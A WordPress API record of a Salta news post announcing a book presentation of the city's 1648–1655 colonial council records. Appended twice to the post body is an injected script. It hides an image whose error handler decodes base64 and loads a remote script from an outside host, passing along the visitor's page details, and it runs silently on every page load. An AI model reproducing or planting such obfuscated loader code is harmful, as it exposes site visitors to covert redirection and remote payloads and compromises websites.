{"id":2815,"date":"2023-07-03T12:13:36","date_gmt":"2023-07-03T15:13:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2815"},"modified":"2025-08-14T00:13:35","modified_gmt":"2025-08-14T03:13:35","slug":"se-presenta-las-actas-capitulares-de-salta-1648-1655-en-el-museo-historico-del-norte","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2815","title":{"rendered":"Se presenta \u201cLas Actas Capitulares de Salta 1648 \u2013 1655\u201d en el Museo Hist\u00f3rico del Norte"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#8b0728\"><em>Este viernes 7 de julio a las 11 horas, se presenta el libro de la editorial de la Universidad Cat\u00f3lica de Salta y el Fondo Editorial de la Secretar\u00eda de Cultura.<\/em><\/h3>\n\n\n\n<p>Este viernes se presentar\u00e1 \u201cLas Actas Capitulares de Salta 1648 \u2013 1655, de Dolores Ayd\u00e9e P\u00e9rez y Lilia Fanny P\u00e9rez. La editorial de la Universidad Cat\u00f3lica de Salta y el Fondo Editorial de la Secretar\u00eda de Cultura, fueron las reparticiones encargadas de realizar la publicaci\u00f3n.<\/p>\n\n\n\n<p>Se trata de la compilaci\u00f3n, transcripci\u00f3n y an\u00e1lisis desde su perspectiva hist\u00f3rica, social, cultural y ling\u00fc\u00edstica (paleogr\u00e1fica) realizado por las historiadoras Dolores Ayd\u00e9e P\u00e9rez y Lilia Fanny P\u00e9rez, de estos documentos hist\u00f3ricos que se encuentran conservados en el Archivo Hist\u00f3rico de la Provincia.<\/p>\n\n\n\n<p>El acto de presentaci\u00f3n de la obra como fuente de investigaci\u00f3n primaria y documento testimonial del periodo colonial contar\u00e1 con la presencia del secretario de Cultura,&nbsp;<strong>Diego Ashur,<\/strong>&nbsp;y el vicerector de Investigaci\u00f3n y Desarrollo,&nbsp;<strong>Daniel S\u00e1nchez Fernandez<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-presenta-las-actas-capitulares-de-salta-1648-1655-en-el-museo-historico-del-norte-90475\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este viernes 7 de julio a las 11 horas, se presenta el libro de la editorial de la Universidad Cat\u00f3lica de Salta y el Fondo Editorial de la Secretar\u00eda de Cultura. Este viernes se presentar\u00e1 \u201cLas Actas Capitulares de Salta 1648 \u2013 1655, de Dolores Ayd\u00e9e P\u00e9rez y Lilia Fanny P\u00e9rez. La editorial de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2816,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2815","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2815"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2815"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2815\/revisions"}],"predecessor-version":[{"id":7037,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2815\/revisions\/7037"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2816"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2815"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2815"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2815"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}